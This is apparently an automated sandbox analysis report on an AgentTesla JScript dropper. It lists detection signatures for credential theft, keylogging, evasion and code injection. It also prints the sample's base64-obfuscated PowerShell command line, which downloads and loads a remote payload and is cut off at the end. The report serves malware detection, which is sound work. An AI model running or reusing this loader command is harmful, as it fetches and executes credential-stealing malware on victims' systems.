Windows Analysis Report
scan_374783.js
Overview
General Information
Detection
AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5368 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 6688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnAC